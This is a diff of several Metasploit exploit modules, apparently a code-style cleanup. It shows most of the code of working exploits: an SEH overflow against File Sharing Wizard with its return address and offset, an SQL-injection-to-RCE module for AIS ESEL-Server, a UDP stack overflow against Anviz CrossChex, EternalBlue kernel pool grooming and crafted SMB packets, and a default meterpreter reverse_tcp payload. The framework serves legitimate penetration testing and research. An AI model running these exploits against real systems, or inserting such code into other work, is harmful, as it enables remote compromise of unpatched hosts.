-      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
-      'DATA'                => /354 Enter mail.*itself/,
-      body                  => nil,
-      '.'                   => /250.*Message accepted for delivery/,
-      'QUIT'                => /221.*Bye/
+      "RCPT TO:<#{to}>" => /250.*Recipient ok/,
+      'DATA' => /354 Enter mail.*itself/,
+      body => nil,
+      '.' => /250.*Message accepted for delivery/,
+      'QUIT' => /221.*Bye/
     }
 
     print_status('Connecting to OpenSMTPD')
@@ -115,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       send_expect(
         line,
         pattern,
-        sock:    sock,
+        sock: sock,
         newline: "\r\n",
         timeout: datastore['ExpectTimeout']
       )

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -11,37 +11,41 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Seh
 
   def initialize(info = {})
-    super update_info(info,
-                      'Name' => 'File Sharing Wizard - POST SEH Overflow',
-                      'Description' => %q(
-        This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.
-      ),
-                      'Author' => [
-                        'x00pwn', # Original exploit
-                        'Dean Welch <dean_welch[at]rapid7.com>' # Module
-                      ],
-                      'License'        => MSF_LICENSE,
-                      'References'     =>
-                          [
-                            %w[CVE 2019-16724],
-                            %w[EDB 47412]
-                          ],
-                      'Payload' =>
-                          {
-                            'BadChars' => "\x00\x20"
-                          },
-                      'DisclosureDate' => '2019-09-24',
-                      'DefaultOptions' =>
-                          {
-                            'RPORT' => 80,
-                            'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
-                          },
-                      'Platform'       => 'win',
-                      'Arch' => [ ARCH_X86 ],
-                      'Targets' =>
-                          [
-                            ['Windows Vista / Windows 7 (x86)', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
-                          ])
+    super(
+      update_info(
+        info,
+        'Name' => 'File Sharing Wizard - POST SEH Overflow',
+        'Description' => %q{
+          This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.
+        },
+        'Author' => [
+          'x00pwn', # Original exploit
+          'Dean Welch <dean_welch[at]rapid7.com>' # Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            %w[CVE 2019-16724],
+            %w[EDB 47412]
+          ],
+        'Payload' =>
+          {
+            'BadChars' => "\x00\x20"
+          },
+        'DisclosureDate' => '2019-09-24',
+        'DefaultOptions' =>
+          {
+            'RPORT' => 80,
+            'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+          },
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86],
+        'Targets' =>
+          [
+            ['Windows Vista / Windows 7 (x86)', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
+          ]
+      )
+    )
   end
 
   def check

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -11,61 +11,64 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
-      'Description'    => %q{
-        This module will execute an arbitrary payload on an "ESEL" server used by the
-        AIS logistic software. The server typically listens on port 5099 without TLS.
-        There could also be server listening on 5100 with TLS but the port 5099 is
-        usually always open.
-        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
-        with the 'sa' user is in place.
+    super(
+      update_info(
+        info,
+        'Name' => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
+        'Description' => %q{
+          This module will execute an arbitrary payload on an "ESEL" server used by the
+          AIS logistic software. The server typically listens on port 5099 without TLS.
+          There could also be server listening on 5100 with TLS but the port 5099 is
+          usually always open.
+          The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
+          with the 'sa' user is in place.
 
-        This module was verified on version 67 but it should also run on lower versions.
-        An fixed version was created by AIS in September 2017. However most systems
-        have not been updated.
+          This module was verified on version 67 but it should also run on lower versions.
+          An fixed version was created by AIS in September 2017. However most systems
+          have not been updated.
 
-        In regard to the payload, unless there is a closed port in the web server,
-        you dont want to use any "bind" payload. You want a "reverse" payload,
-        probably to your port 80 or to any other outbound port allowed on the firewall.
+          In regard to the payload, unless there is a closed port in the web server,
+          you dont want to use any "bind" payload. You want a "reverse" payload,
+          probably to your port 80 or to any other outbound port allowed on the firewall.
 
-        Currently, one delivery method is supported
+          Currently, one delivery method is supported
 
-        This method takes advantage of the Command Stager subsystem. This allows using
-        various techniques, such as using a TFTP server, to send the executable. By default
-        the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+          This method takes advantage of the Command Stager subsystem. This allows using
+          various techniques, such as using a TFTP server, to send the executable. By default
+          the Command Stager uses 'wcsript.exe' to generate the executable on the target.
 
-        NOTE: This module will leave a payload executable on the target system when the
-        attack is finished.
+          NOTE: This module will leave a payload executable on the target system when the
+          attack is finished.
 
-      },
-      'Author'         =>
-        [
-          'Manuel Feifel'
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          ['CVE', '2019-10123'],
-        ],
-      'Platform'       => 'win',
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'Payload'        =>
-        {
-          'BadChars'  => "\x00\xff\x27",
         },
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ],
-        ],
-      'CmdStagerFlavor' => 'vbs',
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2019-03-27',
-      'DefaultOptions' =>
-        {
-          'RPORT' => 5099
-        },
-      ))
+        'Author' =>
+          [
+            'Manuel Feifel'
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', '2019-10123'],
+          ],
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Payload' =>
+          {
+            'BadChars' => "\x00\xff\x27"
+          },
+        'Targets' =>
+          [
+            [ 'Automatic', {} ],
+          ],
+        'CmdStagerFlavor' => 'vbs',
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2019-03-27',
+        'DefaultOptions' =>
+          {
+            'RPORT' => 5099
+          }
+      )
+    )
   end
 
   # This is method required for the CmdStager to work...
@@ -128,7 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Software uses the 'sa' user by default
     send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
     # The porotocol has no limites on max-data
-    execute_cmdstager({ :linemax => 1500 })
+    execute_cmdstager({ linemax: 1500 })
     print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
     print_status('Stager should now be executed.')
   end

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -10,73 +10,77 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Udp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Anviz CrossChex Buffer Overflow',
-      'Description'	=> %q{
-        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
-        triggering a stack buffer overflow.
-      },
-      'Author'	  	=>
-        [
-            'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit
-            'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>',   # original discovery/exploit
-            'agalway-r7',  # Module creation
+    super(
+      update_info(
+        info,
+        'Name' => 'Anviz CrossChex Buffer Overflow',
+        'Description' => %q{
+          Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
+          triggering a stack buffer overflow.
+        },
+        'Author' =>
+          [
+            'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
+            'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
+            'agalway-r7', # Module creation
             'adfoster-r7' # Module creation
-        ],
-      'License'		  => MSF_LICENSE,
-      'References'	=>
-        [
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
             ['CVE', '2019-12518'],
             ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
             ['EDB', '47734']
-        ],
-      'Payload'        =>
-        {
-            'Space'    => 8947,
+          ],
+        'Payload' =>
+          {
+            'Space' => 8947,
             'DisableNops' => true
-        },
-      'Arch' => ARCH_X86,
-      'EncoderType' => Msf::Encoder::Type::Raw,
-      'Privileged'	=> true,
-      'Platform' => 'win',
-      'DisclosureDate' => '2019-11-28',
-      'Targets'        =>
-          [
+          },
+        'Arch' => ARCH_X86,
+        'EncoderType' => Msf::Encoder::Type::Raw,
+        'Privileged' => true,
+        'Platform' => 'win',
+        'DisclosureDate' => '2019-11-28',
+        'Targets' =>
             [
-              'Crosschex Standard x86 <= V4.3.12',
-              {
+              [
+                'Crosschex Standard x86 <= V4.3.12',
+                {
                   'Offset' => 261, # Overwrites stack memory to allow saved EIP to be overwritten
                   'Ret' => "\x07\x18\x42\x00", # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code
                   'Shift' => 4 # Positions payload to be written at beginning of ESP
-              }
-            ]
-          ],
-      'DefaultTarget'  => 0
-      ))
+                }
+              ]
+            ],
+        'DefaultTarget' => 0
+      )
+    )
     deregister_udp_options
     register_options(
-        [
-            Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
-            Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
-            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
-        ])
+      [
+        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
+        Opt::CHOST('0.0.0.0', true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
+        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
+      ]
+    )
   end
 
   def exploit
     connect_udp
 
-    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
+    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore['TIMEOUT'].to_i > 0 ? datastore['TIMEOUT'].to_i : nil)
     if res.empty?
-      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
+      fail_with(Failure::TimeoutExpired, 'Module timed out waiting for CrossChex broadcast')
     end
 
-    print_status "CrossChex broadcast received, sending payload in response"
+    print_status 'CrossChex broadcast received, sending payload in response'
     sploit = rand_text_english(target['Offset'])
     sploit << target.ret # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code
     sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
     sploit << payload.encoded
 
     udp_sock.sendto(sploit, host, port)
-    print_status "Payload sent"
-    end
+    print_status 'Payload sent'
+  end
 end

--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -14,91 +14,94 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::DCERPC
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
-      'Description'    => %q(
-        This module is a port of the Equation Group ETERNALBLUE exploit, part of
-        the FuzzBunch toolkit released by Shadow Brokers.
+    super(
+      update_info(
+        info,
+        'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
+        'Description' => %q{
+          This module is a port of the Equation Group ETERNALBLUE exploit, part of
+          the FuzzBunch toolkit released by Shadow Brokers.
 
-        There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
-        is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
-        DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
-        is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
-        completed in srvnet!SrvNetWskReceiveComplete.
+          There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
+          is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
+          DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
+          is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
+          completed in srvnet!SrvNetWskReceiveComplete.
 
-        This exploit, like the original may not trigger 100% of the time, and should be
-        run continuously until triggered. It seems like the pool will get hot streaks
-        and need a cool down period before the shells rain in again.
+          This exploit, like the original may not trigger 100% of the time, and should be
+          run continuously until triggered. It seems like the pool will get hot streaks
+          and need a cool down period before the shells rain in again.
 
-        The module will attempt to use Anonymous login, by default, to authenticate to perform the
-        exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use
-        those instead.
+          The module will attempt to use Anonymous login, by default, to authenticate to perform the
+          exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use
+          those instead.
 
-        On some systems, this module may cause system instability and crashes, such as a BSOD or
-        a reboot. This may be more likely with some payloads.
-      ),
+          On some systems, this module may cause system instability and crashes, such as a BSOD or
+          a reboot. This may be more likely with some payloads.
+        },
 
-      'Author' =>
-      [
-        'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0
-        'Dylan Davis <dylan.davis@risksense.com>',  # @jennamagius
-        'Equation Group',
-        'Shadow Brokers',
-        'thelightcosine' # RubySMB refactor and Fallback Credential mode
-      ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
+        'Author' =>
         [
-          ['MSB', 'MS17-010'],
-          ['CVE', '2017-0143'],
-          ['CVE', '2017-0144'],
-          ['CVE', '2017-0145'],
-          ['CVE', '2017-0146'],
-          ['CVE', '2017-0147'],
-          ['CVE', '2017-0148'],
-          ['URL', 'https://github.com/RiskSense-Ops/MS17-010']
+          'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
+          'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
+          'Equation Group',
+          'Shadow Brokers',
+          'thelightcosine' # RubySMB refactor and Fallback Credential mode
         ],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread',
-          'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',
-          'WfsDelay' => 5
-        },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'        => 2000, # this can be more, needs to be recalculated
-          'EncoderType'  => Msf::Encoder::Type::Raw
-        },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'License' => MSF_LICENSE,
+        'References' =>
           [
-            'Windows 7 and Server 2008 R2 (x64) All Service Packs',
-            {
-              'Platform'       => 'win',
-              'Arch'           => [ARCH_X64],
-              'os_patterns'    => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
-              'ep_thl_b'       => 0x308,  # EPROCESS.ThreadListHead.Blink offset
-              'et_alertable'   => 0x4c,   # ETHREAD.Alertable offset
-              'teb_acp'        => 0x2c8,  # TEB.ActivationContextPointer offset
-              'et_tle'         => 0x420   # ETHREAD.ThreadListEntry offset
-            }
-          ]
-        ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Mar 14 2017',
-      'Notes'          =>
-        {
-          'AKA' => ['ETERNALBLUE']
-        }
-    ))
+            ['MSB', 'MS17-010'],
+            ['CVE', '2017-0143'],
+            ['CVE', '2017-0144'],
+            ['CVE', '2017-0145'],
+            ['CVE', '2017-0146'],
+            ['CVE', '2017-0147'],
+            ['CVE', '2017-0148'],
+            ['URL', 'https://github.com/RiskSense-Ops/MS17-010']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+            'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',
+            'WfsDelay' => 5
+          },
+        'Privileged' => true,
+        'Payload' =>
+          {
+            'Space' => 2000, # this can be more, needs to be recalculated
+            'EncoderType' => Msf::Encoder::Type::Raw
+          },
+        'Platform' => 'win',
+        'Targets' =>
+          [
+            [
+              'Windows 7 and Server 2008 R2 (x64) All Service Packs',
+              {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X64],
+                'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
+                'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
+                'et_alertable' => 0x4c, # ETHREAD.Alertable offset
+                'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
+                'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
+              }
+            ]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Mar 14 2017',
+        'Notes' =>
+          {
+            'AKA' => ['ETERNALBLUE']
+          }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(445),
-        OptBool.new('VERIFY_TARGET', [true, "Check if remote OS matches exploit Target.", true]),
-        OptBool.new('VERIFY_ARCH', [true, "Check if remote architecture matches exploit Target.", true]),
+        OptBool.new('VERIFY_TARGET', [true, 'Check if remote OS matches exploit Target.', true]),
+        OptBool.new('VERIFY_ARCH', [true, 'Check if remote architecture matches exploit Target.', true]),
         OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
         OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
         OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])
@@ -108,9 +111,9 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptBool.new('ForceExploit', [false, 'Override check result', false]),
         OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
-        OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
-        OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
-        OptInt.new('GroomDelta', [true, "The amount to increase the groom count by per try.", 5])
+        OptInt.new('MaxExploitAttempts', [true, 'The number of times to retry the exploit.', 3]),
+        OptInt.new('GroomAllocations', [true, 'Initial number of times to groom the kernel pool.', 12]),
+        OptInt.new('GroomDelta', [true, 'The amount to increase the groom count by per try.', 5])
       ]
     )
 
@@ -132,42 +135,41 @@ class MetasploitModule < Msf::Exploit::Remote
         # we don't need this sleep, and need to find a way to remove it
         # problem is session_count won't increment until stage is complete :\
         secs = 0
-        while !session_created? and secs < 30
+        while !session_created? && (secs < 30)
           secs += 1
           sleep 1
         end
 
         if session_created?
-          print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
-          print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
-          print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
+          print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
+          print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
+          print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
           break
         else
-          print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
-          print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
-          print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
+          print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
+          print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
+          print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
         end
       end
-
     rescue EternalBlueError => e
-      print_error("#{e.message}")
+      print_error(e.message.to_s)
       return false
     rescue ::RubySMB::Error::NegotiationFailure
-      print_error("SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.")
+      print_error('SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.')
       return false
-    rescue  ::RubySMB::Error::UnexpectedStatusCode,
-            ::Errno::ECONNRESET,
-            ::Rex::HostUnreachable,
-            ::Rex::ConnectionTimeout,
-            ::Rex::ConnectionRefused,
-            ::RubySMB::Error::CommunicationError => e
+    rescue ::RubySMB::Error::UnexpectedStatusCode,
+           ::Errno::ECONNRESET,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionRefused,
+           ::RubySMB::Error::CommunicationError => e
       print_error("#{e.class}: #{e.message}")
       report_failure
       return false
-    rescue => error
-      print_error(error.class.to_s)
-      print_error(error.message)
-      print_error(error.backtrace.join("\n"))
+    rescue StandardError => e
+      print_error(e.class.to_s)
+      print_error(e.message)
+      print_error(e.backtrace.join("\n"))
       return false
     ensure
       # pass
@@ -177,18 +179,18 @@ class MetasploitModule < Msf::Exploit::Remote
   def smb_eternalblue(process_name, grooms)
     begin
       # Step 0: pre-calculate what we can
-      shellcode =  make_kernel_user_payload(payload.encode, process_name, 0, 0, 0, 0)
+      shellcode = make_kernel_user_payload(payload.encode, process_name, 0, 0, 0, 0)
       payload_hdr_pkt = make_smb2_payload_headers_packet
       payload_body_pkt = make_smb2_payload_body_packet(shellcode)
 
       # Step 1: Connect to IPC$ share
-      print_status("Connecting to target for exploitation.")
-      client, tree, sock, os = smb1_anonymous_connect_ipc()
+      print_status('Connecting to target for exploitation.')
+      client, tree, sock, os = smb1_anonymous_connect_ipc
     rescue RubySMB::Error::CommunicationError
       # Error handler in case SMBv1 disabled on target
       raise EternalBlueError, 'Could not make SMBv1 connection'
     else
-      print_good("Connection established for exploitation.")
+      print_good('Connection established for exploitation.')
 
       if verify_target(os)
         print_good('Target OS selected valid for OS indicated by SMB reply')
@@ -212,40 +214,40 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Trying exploit with #{grooms} Groom Allocations.")
 
       # Step 2: Create a large SMB1 buffer
-      print_status("Sending all but last fragment of exploit packet")
+      print_status('Sending all but last fragment of exploit packet')
       smb1_large_buffer(client, tree, sock)
 
       # Step 3: Groom the pool with payload packets, and open/close SMB1 packets
-      print_status("Starting non-paged pool grooming")
+      print_status('Starting non-paged pool grooming')
 
       # initialize_groom_threads(ip, port, payload, grooms)
       fhs_sock = smb1_free_hole(true)
 
       @groom_socks = []
 
-      print_good("Sending SMBv2 buffers")
+      print_good('Sending SMBv2 buffers')
       smb2_grooms(grooms, payload_hdr_pkt)
 
       fhf_sock = smb1_free_hole(false)
 
-      print_good("Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.")
-      fhs_sock.shutdown()
+      print_good('Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.')
+      fhs_sock.shutdown
 
-      print_status("Sending final SMBv2 buffers.") # 6x
-      smb2_grooms(6, payload_hdr_pkt) # todo: magic #
+      print_status('Sending final SMBv2 buffers.') # 6x
+      smb2_grooms(6, payload_hdr_pkt) # TODO: magic #
 
-      fhf_sock.shutdown()
+      fhf_sock.shutdown
 
-      print_status("Sending last fragment of exploit packet!")
+      print_status('Sending last fragment of exploit packet!')
       final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)
       sock.put(final_exploit_pkt)
 
-      print_status("Receiving response from exploit packet")
+      print_status('Receiving response from exploit packet')
       code, raw = smb1_get_response(sock)
 
-      code_str = "0x" + code.to_i.to_s(16).upcase
+      code_str = '0x' + code.to_i.to_s(16).upcase
       if code.nil?
-        print_error("Did not receive a response from exploit packet")
+        print_error('Did not receive a response from exploit packet')
       elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)
         print_good("ETERNALBLUE overwrite completed successfully (#{code_str})!")
       else
@@ -253,12 +255,12 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # Step 4: Send the payload
-      print_status("Sending egg to corrupted connection.")
+      print_status('Sending egg to corrupted connection.')
 
-      @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }
-      @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }
+      @groom_socks.each { |gsock| gsock.put(payload_body_pkt.first(2920)) }
+      @groom_socks.each { |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }
 
-      print_status("Triggering free of corrupted buffer.")
+      print_status('Triggering free of corrupted buffer.')
       # tree disconnect
       # logoff and x
       # note: these aren't necessary, just close the sockets
@@ -269,8 +271,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def verify_target(os)
-    os = os.gsub("\x00", '')  # strip unicode bs
-    os << "\x00"              # but original has a null
+    os = os.gsub("\x00", '') # strip unicode bs
+    os << "\x00" # but original has a null
     ret = true
 
     if datastore['VerifyTarget']
@@ -296,19 +298,19 @@ class MetasploitModule < Msf::Exploit::Remote
     return true if arch && arch == target_arch.first
 
     print_warning("Target arch is #{target_arch.first}, but server returned #{arch.inspect}")
-    print_warning("The DCE/RPC service or probe may be blocked") if arch.nil?
+    print_warning('The DCE/RPC service or probe may be blocked') if arch.nil?
     false
   end
 
   def print_core_buffer(os)
-    print_status("CORE raw buffer dump (#{os.length.to_s} bytes)")
+    print_status("CORE raw buffer dump (#{os.length} bytes)")
 
     count = 0
     chunks = os.scan(/.{1,16}/)
-    chunks.each do | chunk |
-      hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, "0") }.join(" ")
+    chunks.each do |chunk|
+      hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, '0') }.join(' ')
 
-      format = "0x%08x  %-47s  %-16s" % [(count * 16), hexdump, chunk]
+      format = format('0x%08x  %-47s  %-16s', (count * 16), hexdump, chunk)
       print_status(format)
       count += 1
     end
@@ -325,7 +327,7 @@ class MetasploitModule < Msf::Exploit::Remote
   '''
 
   def smb2_grooms(grooms, payload_hdr_pkt)
-    grooms.times do |groom_id|
+    grooms.times do |_groom_id|
       gsock = connect(false)
       @groom_socks << gsock
       gsock.put(payload_hdr_pkt)
@@ -339,8 +341,9 @@ class MetasploitModule < Msf::Exploit::Remote
     response_code = client.login
 
     unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
-      raise RubySMB::Error::UnexpectedStatusCode, "Error with login: #{response_code.to_s}"
+      raise RubySMB::Error::UnexpectedStatusCode, "Error with login: #{response_code}"
     end
+
     os = client.peer_native_os
 
     tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
@@ -352,7 +355,7 @@ class MetasploitModule < Msf::Exploit::Remote
     nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)
 
     # send NT Trans
-    vprint_status("Sending NT Trans Request packet")
+    vprint_status('Sending NT Trans Request packet')
 
     client.send_recv(nt_trans_pkt)
     # Initial Trans2  request
@@ -360,19 +363,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # send all but last packet
     for i in 1..14
-        trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)
+      trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)
     end
 
-    vprint_status("Sending malformed Trans2 packets")
+    vprint_status('Sending malformed Trans2 packets')
     sock.put(trans2_pkt_nulled)
 
     begin
       sock.get_once
     rescue EOFError
-      vprint_error("No response back from SMB echo request.  Continuing anyway...")
+      vprint_error('No response back from SMB echo request.  Continuing anyway...')
     end
 
-    client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
+    client.echo(count: 1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
   end
 
   def smb1_free_hole(start)
@@ -381,13 +384,13 @@ class MetasploitModule < Msf::Exploit::Remote
     client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)
     client.negotiate
 
-    pkt = ""
+    pkt = ''
 
     if start
-      vprint_status("Sending start free hole packet.")
+      vprint_status('Sending start free hole packet.')
       pkt = make_smb1_free_hole_session_packet("\x07\xc0", "\x2d\x01", "\xf0\xff\x00\x00\x00")
     else
-      vprint_status("Sending end free hole packet.")
+      vprint_status('Sending end free hole packet.')
       pkt = make_smb1_free_hole_session_packet("\x07\x40", "\x2c\x01", "\xf8\x87\x00\x00\x00")
     end
 
@@ -401,10 +404,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # dirty hack since it doesn't always like to reply the first time...
     16.times do
       raw = sock.get_once
-      break unless raw.nil? or raw.empty?
+      break unless raw.nil? || raw.empty?
     end
 
     return nil unless raw
+
     response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
     code = response.nt_status
     return code, raw, response
@@ -412,10 +416,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def make_smb2_payload_headers_packet
     # don't need a library here, the packet is essentially nonsensical
-    pkt = ""
-    pkt << "\x00"             # session message
-    pkt << "\x00\xff\xf7"     # size
-    pkt << "\xfeSMB"          # SMB2
+    pkt = ''
+    pkt << "\x00" # session message
+    pkt << "\x00\xff\xf7" # size
+    pkt << "\xfeSMB" # SMB2
     pkt << "\x00" * 124
 
     pkt
